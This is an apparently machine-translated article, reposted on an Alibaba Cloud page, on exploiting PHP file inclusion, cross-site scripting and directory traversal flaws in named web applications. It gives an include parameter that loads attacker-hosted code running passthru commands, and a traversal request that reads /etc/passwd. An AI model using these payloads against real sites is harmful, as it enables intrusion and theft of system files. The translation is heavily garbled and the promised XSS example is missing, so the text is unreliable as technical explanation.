Common PHP page vulnerability analysis and related title resolution

Source: Internet
Author: User
From the perspective of network security, ASP is the most common WEB page vulnerability. in this regard, John is an expert and I have no right to speak. however, in terms of PHP, there are also serious security titles, but there are few articles in this regard. in

From the perspective of network security, ASP is the most common WEB page vulnerability. in this regard, John is an expert and I have no right to speak. however, in terms of PHP, there are also serious security titles, but there are few articles in this regard. here, let's talk about the PHP page's related vulnerabilities.
  
I have summarized common PHP vulnerabilities, including file vulnerabilities, script command execution vulnerabilities, file leakage vulnerabilities, and SQL injection vulnerabilities. of course, some common skills such as COOKIE spoofing will not be discussed here, and there are many such materials online. let's analyze how to exploit these vulnerabilities one by one!
  
First, we will discuss the file inclusion vulnerability. this vulnerability should be exclusive to PHP. this is due to insufficient processing of external malicious data, which allows remote attackers to exploit these vulnerabilities to execute arbitrary commands on the system with WEB process permissions. let's look at an example: suppose in. php has the following code:

Include ($ include. '/***. php ');
?>

In this code, $ include is generally a set path, but we can structure a path to achieve the attack goal. in a metaphor, we submit: a. php? Include = http: // web/B. php, this web is the space we use for attacks, of course, B. php is the code we use to attack. we can. the code written in php is similar to: passthru ('/bin/ls/etc. in this way, you can perform some targeted attacks. (Note: The web server should be unable to fulfill the php code, or the title will be displayed. for more information, see < <如何对php程序中的常见漏洞进行攻击> > ). In terms of this vulnerability, there are a lot of issues, like PayPal Store Front, HotNews, Mambo Open Source, PhpDig, yabb se, phpBB, InvisionBoard, solmetra spaw Editor, Les Visiteurs, phpGedView, X-Cart, and so on.
  
Next, let's take a look at the script command fulfillment vulnerability. this is because the URI parameters submitted by the user are not fully filtered. submitting data containing malicious HTML code can trigger cross-site scripting attacks and obtain sensitive information of the target user. For example, the index. PHP page in PHP 4.3.1 or earlier versions of PHP Transparent does not fully filter PHPSESSID. we can use this code to achieve the attack target:

In the script, we can use structural functions to obtain some sensitive information of users. in terms of this vulnerability, PHP Transparent, PHP-Nuke, phpBB, PHP Classifieds, PHPix, Ultimate PHP Board, and so on.
  
Next, let's look at the file leakage vulnerability. this vulnerability is caused by insufficient filtering of user submitted parameters. remote attackers can exploit it to perform directory traversal attacks and obtain some sensitive information. Let's take phpMyAdmin as an example. in phpMyAdmin, export. the php page does not fully Filter user-submitted 'wh' parameters. remote attacker submissions contain multiple '.. /'character data, attackers can bypass the web root restriction and view any file information on the system with WEB permissions. The following is an address: export. php? What = .. /.. /.. /.. /.. /.. /etc/passwd \ 0 can achieve the object leakage goal. in this regard, there are more: myPHPNuke, McNews and so on.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.